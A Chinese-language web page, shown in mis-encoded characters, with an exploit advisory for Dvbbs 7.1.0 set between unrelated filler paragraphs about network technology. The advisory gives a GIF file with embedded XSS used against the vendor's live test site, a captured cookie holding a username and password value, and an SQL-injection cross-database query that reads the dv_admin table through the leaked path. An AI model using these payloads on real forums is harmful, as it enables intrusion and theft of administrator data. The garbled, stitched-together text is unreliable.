網(wǎng)絡(luò)技術(shù)是從1990年代中期發(fā)展起來的新技術(shù),它把互聯(lián)網(wǎng)上分散的資源融為有機整體,實現(xiàn)資源的全面共享和有機協(xié)作,使人們能夠透明地使用資源的整體能力并按需獲取信息。資源包括高性能計算機、存儲資源、數(shù)據(jù)資源、信息資源、知識資源、專家資源、大型數(shù)據(jù)庫、網(wǎng)絡(luò)、傳感器等。 當(dāng)前的互聯(lián)網(wǎng)只限于信息共享,網(wǎng)絡(luò)則被認(rèn)為是互聯(lián)網(wǎng)發(fā)展的第三階段。 廠商名字:動網(wǎng)先鋒論談廠商地址:http://www.dvbbs.net/ 漏洞程序:Dvbbs 7.1.0 漏洞描述: Dvbbs 7.1.0 的Cookie存在泄露站點的絕對路徑的漏洞,攻擊者可以配合其它技術(shù),實現(xiàn)SQL跨庫查詢等。 漏洞利用例子: 一、泄露絕對漏洞測試: 對官方的測試站點:bbs.dvbbs.net 上傳一張圖,代碼如下: GIF89a <script>alert(document.cookie)</script> 抓包得到cookie如下 Cookie: ASPSESSIONIDSSDSCBQD=NHANOBNCAPCPAMCFMAGDIJCB; dwebdvbbs7%2E1%2E0=UserID=617054&usercookies=1& userclass=%D0%C2%CA%D6%C9%CF%C2%B7& username=linzibct&password=t8ob621664s5v6HL&userhidden=2 &StatUserID=2189992004; Dvbbs= 分析cookie可以得到站點的絕對路徑如下: d:\\web\\dvbbs7為論談的絕對路徑 二、攻擊延伸: www.host.com 主程序存在sql注入漏洞,但是找不到表名和字段名。 注入點假設(shè): www.host.com\\linzi.asp?fuck=you 論談為dvbbs 7.1.0 ,數(shù)據(jù)庫為data\\\\dvbbs.asp,做了防下載處理. 利用上面的動網(wǎng)暴路徑,抓包得到絕對路徑為 d:\\www\\dvbbs\\data\\dvbbs.asp 實現(xiàn)跨庫查詢?nèi)缦? www.host.com\\linzi.asp?fuck=you and (select count(*) from dv_admin in "d:\\www\\dvbbs\\data\\dvbbs.asp") 官方補丁: 尚無 網(wǎng)絡(luò)的神奇作用吸引著越來越多的用戶加入其中,正因如此,網(wǎng)絡(luò)的承受能力也面臨著越來越嚴(yán)峻的考驗―從硬件上、軟件上、所用標(biāo)準(zhǔn)上......,各項技術(shù)都需要適時應(yīng)勢,對應(yīng)發(fā)展,這正是網(wǎng)絡(luò)迅速走向進(jìn)步的催化劑。 |
溫馨提示:喜歡本站的話,請收藏一下本站!